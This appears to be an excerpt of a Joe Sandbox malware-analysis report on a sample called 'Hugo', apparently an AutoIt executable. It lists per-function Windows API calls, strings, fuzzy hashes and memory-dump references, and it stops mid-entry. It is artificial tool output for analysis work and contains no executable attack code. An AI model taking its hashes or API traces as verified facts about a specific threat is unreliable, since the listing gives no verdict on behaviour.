API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 08f5f1174f9ff38cb36834bb18b9ad173023457323b5cf4a2a878ad214323f9b
Instruction ID: c84c2d640a5b3d357d9f424f2b1f7f5e5c5cea121367dafa5b18176bedf2e287
Opcode Fuzzy Hash: 08f5f1174f9ff38cb36834bb18b9ad173023457323b5cf4a2a878ad214323f9b
Instruction Fuzzy Hash: 2B61B0716083019FE710DF64C889F6ABBE8BF59714F00090AF9859B291CB74FD46EB92

Function 00F88BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00F88C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00F88CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F88CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F88D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00F88D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00F88D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F88DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00F88DDA

Strings

*.*, xrefs: 00F88DE0

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: f7cee2fa94c39b0ea550573193c02437fd959f506746eddbaa9613c1fb5173c3
Instruction ID: e40ff40caf7b597040fcd0498dbe203d5dc1c2e0354d0220d13886ce73e5ecfa
Opcode Fuzzy Hash: f7cee2fa94c39b0ea550573193c02437fd959f506746eddbaa9613c1fb5173c3
Instruction Fuzzy Hash: 346169B2504305AFCB10EF60C845ADEB7E8FF99320F44482EF98987251DB35E946DB92

Function 00FA46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00FA4715
SetMenu.USER32(?,00000000), ref: 00FA4724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FA47AC
IsMenu.USER32(?), ref: 00FA47C0
CreatePopupMenu.USER32 ref: 00FA47CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FA47F7
DrawMenuBar.USER32 ref: 00FA47FF

Strings

0, xrefs: 00FA46F0
F, xrefs: 00FA47EA

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 7e74fc83084bc4e708954c8f419c59d24de65155e80b6c0b5bd3ff60bbb75376
Instruction ID: 5fcf856cb55f02ccd03a73266872cd48d657843429d92d159e4afad68b957c98
Opcode Fuzzy Hash: 7e74fc83084bc4e708954c8f419c59d24de65155e80b6c0b5bd3ff60bbb75376
Instruction Fuzzy Hash: E7418FB5A01249EFDB14CF64E884EAA7BB5FF8A314F144028FA4697390D7B4A910EF50

Function 00F7282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00F728B1
GetDlgCtrlID.USER32 ref: 00F728BC
GetParent.USER32 ref: 00F728D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F728DB
GetDlgCtrlID.USER32(?), ref: 00F728E4
GetParent.USER32(?), ref: 00F728F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F728FB

Strings

ComboBox, xrefs: 00F72839
ListBox, xrefs: 00F7286E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: b53ef6fb20b203d72b6adbd9035a6b5ac3a9d119ff6522c6af10da3a639a1b30
Instruction ID: eba38a7c66f8d484225df90b66568d1d4b580d3d22f687479bf354e641e4095c
Opcode Fuzzy Hash: b53ef6fb20b203d72b6adbd9035a6b5ac3a9d119ff6522c6af10da3a639a1b30
Instruction Fuzzy Hash: DA21B0B5D00118BBCF14AFA0CC85EEEBBB4EF06350F044157B966A3291DB399859FB61

Function 00F7290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

Part of subcall function 00F745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F74620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00F72990
GetDlgCtrlID.USER32 ref: 00F7299B
GetParent.USER32 ref: 00F729B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F729BA
GetDlgCtrlID.USER32(?), ref: 00F729C3
GetParent.USER32(?), ref: 00F729D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F729DA

Strings

ComboBox, xrefs: 00F7291A
ListBox, xrefs: 00F7294F

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: f3b8da4e22c6cca9924ce0a1f41463225bf3b88fbc2d7fe59063c17752621e3a
Instruction ID: e8196f0c9b84acf8f5ed1e0801245fbd69196ca9557eba1c522e1f9de27258d9
Opcode Fuzzy Hash: f3b8da4e22c6cca9924ce0a1f41463225bf3b88fbc2d7fe59063c17752621e3a
Instruction Fuzzy Hash: E221D4B6D00118BBCF04AFA0CC85EEEBBB8EF05350F044057B95593291CB399859FB61

Function 00FA44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FA4539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FA453C
GetWindowLongW.USER32(?,000000F0), ref: 00FA4563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FA4586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FA45FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00FA4648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00FA4663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00FA467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00FA4692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00FA46AF

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 949bcf9eb194ab5162c55d6b06ccd2801c82f0d84c37adcea786854a23beb8fe
Instruction ID: be36e80e692df5d02eeee7cb41631b9402d8eec5cf7307accbd12a89c9dfbd35
Opcode Fuzzy Hash: 949bcf9eb194ab5162c55d6b06ccd2801c82f0d84c37adcea786854a23beb8fe
Instruction Fuzzy Hash: 6F617FB5940248AFDB10DF64CC81EEEB7B8EF4A710F100155FA15E7391D7B4A946EB50

Function 00F7BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00F7BB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BB2C
GetWindowThreadProcessId.USER32(00000000), ref: 00F7BB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F7BB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F7ABA8,?,00000001), ref: 00F7BBE4

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: b11ef7e14eba6e311e4b787261f7840c8fbeca052a3a510ef469c423c8919d95
Instruction ID: 34df8a59700c533ef0494d0e88d4462640e66b416bcb9a1af2577a8727310f82
Opcode Fuzzy Hash: b11ef7e14eba6e311e4b787261f7840c8fbeca052a3a510ef469c423c8919d95
Instruction Fuzzy Hash: D5319AB1904208AFDB149F19DCC4F697BA9EBCA322F10801AFF09D71A4D774A940AF55

Function 00F42FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F43007

Part of subcall function 00F42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4), ref: 00F42D4E
Part of subcall function 00F42D38: GetLastError.KERNEL32(00FE1DC4,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4,00FE1DC4), ref: 00F42D60

_free.LIBCMT ref: 00F43013
_free.LIBCMT ref: 00F4301E
_free.LIBCMT ref: 00F43029
_free.LIBCMT ref: 00F43034
_free.LIBCMT ref: 00F4303F
_free.LIBCMT ref: 00F4304A
_free.LIBCMT ref: 00F43055
_free.LIBCMT ref: 00F43060
_free.LIBCMT ref: 00F4306E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: df1a5f33bdcc070e0ab5f7535bdbda91d7a81826ee651dc4ae627726d17022ed
Instruction ID: 9294ca984210492439846cb0ba4b2cd3fe8b56269c6335875f0c948be6b48470
Opcode Fuzzy Hash: df1a5f33bdcc070e0ab5f7535bdbda91d7a81826ee651dc4ae627726d17022ed
Instruction Fuzzy Hash: 09117476900108AFCB81EF94CC82DDD7FB5EF05350BD145B5FE089B222DA36EA51AB90

Function 00F12AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F12AF9
OleUninitialize.OLE32(?,00000000), ref: 00F12B98
UnregisterHotKey.USER32(?), ref: 00F12D7D
DestroyWindow.USER32(?), ref: 00F53A1B
FreeLibrary.KERNEL32(?), ref: 00F53A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F53AAD

Strings

close all, xrefs: 00F12AF4

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 1fda0cb3c57976409767aff834316476f80210ae4dc3b4910c3f47548d39929d
Instruction ID: 84576d728d061901184b85690d3dc0c8c61552b79989863c9945aa71900847b5
Opcode Fuzzy Hash: 1fda0cb3c57976409767aff834316476f80210ae4dc3b4910c3f47548d39929d
Instruction Fuzzy Hash: D2D1AE71B01212DFCB18EF54C855BA9F7A0BF44761F1102ADE94A6B262CB34ED66EF40

Function 00F88835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F889F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00F88A06
GetFileAttributesW.KERNEL32(?), ref: 00F88A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00F88A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00F88A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00F88AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F88AF5

Strings

*.*, xrefs: 00F88AAB

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: df873bf31b91d6a76d258020be257831e24b2e119079b022b396d548928071eb
Instruction ID: 8076480e6bbea6a33d88519828603adfc0128df8b05df1c73a077dba89ec4c19
Opcode Fuzzy Hash: df873bf31b91d6a76d258020be257831e24b2e119079b022b396d548928071eb
Instruction Fuzzy Hash: 9A81C2729043059BDB24FF14C844AFAB3D8BF847A0F94481AF885D7250DF38E946EB92

Function 00F17447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00F174D7

Part of subcall function 00F17567: GetClientRect.USER32(?,?), ref: 00F1758D
Part of subcall function 00F17567: GetWindowRect.USER32(?,?), ref: 00F175CE
Part of subcall function 00F17567: ScreenToClient.USER32(?,?), ref: 00F175F6

GetDC.USER32 ref: 00F56083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F56096
SelectObject.GDI32(00000000,00000000), ref: 00F560A4
SelectObject.GDI32(00000000,00000000), ref: 00F560B9
ReleaseDC.USER32(?,00000000), ref: 00F560C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F56152

Strings

U, xrefs: 00F56021

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 2c05017becb69896c8463ed52ba73e21d03336cd04a4a8d453ab599fe61b35d8
Instruction ID: 15c02888893eda2be830ed1b5dde0be164c08745b121225088e32bf6f5289e7c
Opcode Fuzzy Hash: 2c05017becb69896c8463ed52ba73e21d03336cd04a4a8d453ab599fe61b35d8
Instruction Fuzzy Hash: 62719F31904209DFCF259F64CC84ABA7BB5EB49322F144269EE659B1A6D7318884FB50

Function 00FA955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0

Part of subcall function 00F119CD: GetCursorPos.USER32(?), ref: 00F119E1
Part of subcall function 00F119CD: ScreenToClient.USER32(00000000,?), ref: 00F119FE
Part of subcall function 00F119CD: GetAsyncKeyState.USER32(00000001), ref: 00F11A23
Part of subcall function 00F119CD: GetAsyncKeyState.USER32(00000002), ref: 00F11A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00FA95C7
ImageList_EndDrag.COMCTL32 ref: 00FA95CD
ReleaseCapture.USER32 ref: 00FA95D3
SetWindowTextW.USER32(?,00000000), ref: 00FA966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00FA9681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00FA975B

Strings

@GUI_DRAGFILE, xrefs: 00FA96F6
@GUI_DROPID, xrefs: 00FA96AD

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: d0cab2fb1d0ab556519957aa2af0aa9fd38f36d1976d9f4b3ab421a4298c6cf0
Instruction ID: 0d4356c93709cd9d225a1b6272cbf8e51aab246ea1a4582aeac8d543d5d4e14e
Opcode Fuzzy Hash: d0cab2fb1d0ab556519957aa2af0aa9fd38f36d1976d9f4b3ab421a4298c6cf0
Instruction Fuzzy Hash: 8E518DB1504344AFD704EF24CC96FAA77E4FB84710F40052DF996972E2DBB49944EB52

Function 00F8CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F8CCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F8CCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F8CD0F
GetLastError.KERNEL32 ref: 00F8CD67
SetEvent.KERNEL32(?), ref: 00F8CD7B
InternetCloseHandle.WININET(00000000), ref: 00F8CD86

Strings

, xrefs: 00F8CD00

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 4b3d49b115c28462b1b173c01834cc25e88dec345bb00656db85f1fd493092fb
Instruction ID: 04a603d07f52395bb2b1edd5b8304674050d16831de995c81892dbb7a69d4422
Opcode Fuzzy Hash: 4b3d49b115c28462b1b173c01834cc25e88dec345bb00656db85f1fd493092fb
Instruction Fuzzy Hash: E3316BB2A00208AFD721BF659C88AEB7BFCEB45750B10452AF45696610DB34E904ABB0

Function 00F7A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F555AE,?,?,Bad directive syntax error,00FADCD0,00000000,00000010,?,?), ref: 00F7A236
LoadStringW.USER32(00000000,?,00F555AE,?), ref: 00F7A23D

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00F7A301

Strings

Error: , xrefs: 00F7A2CF
., xrefs: 00F7A2E7
%s (%d) : ==> %s.: %s %s, xrefs: 00F7A26B
Line %d (File "%s"):, xrefs: 00F7A2A7
Line %d:, xrefs: 00F7A28C

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 1495f2b3661a41cc49afee90f7fc8d2e1ec865b4bc65e6aebc5e84a244aae2e7
Instruction ID: 2ceb228bcffac43fc1cf9cd63f444f3e4177c41c42e3d3e84a18b9fadf2a8ef9
Opcode Fuzzy Hash: 1495f2b3661a41cc49afee90f7fc8d2e1ec865b4bc65e6aebc5e84a244aae2e7
Instruction Fuzzy Hash: 0A214F7280421EEBCF12EF90CC06EEE7B39BF18700F04446AF515A51A2EB759658FB12

Function 00F729EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00F729F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00F72A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F72A9A

Strings

SHELLDLL_DefView, xrefs: 00F72A19
largeicons, xrefs: 00F72A2E
list, xrefs: 00F72A7C
details, xrefs: 00F72A48
smallicons, xrefs: 00F72A62

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 417f35f16598fd0369e83540a4c7bd925c80e7343eddd981a93abf92381423ac
Instruction ID: 7c95089c6a828d283d6930fc37403d935e5dc99e3213824b01e1abfb59862842
Opcode Fuzzy Hash: 417f35f16598fd0369e83540a4c7bd925c80e7343eddd981a93abf92381423ac
Instruction Fuzzy Hash: BC11E977644307B9FA246720DC07DAA379DDF55B34F204013F509E51D1FB69B8417516

Function 00F17567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00F1758D
GetWindowRect.USER32(?,?), ref: 00F175CE
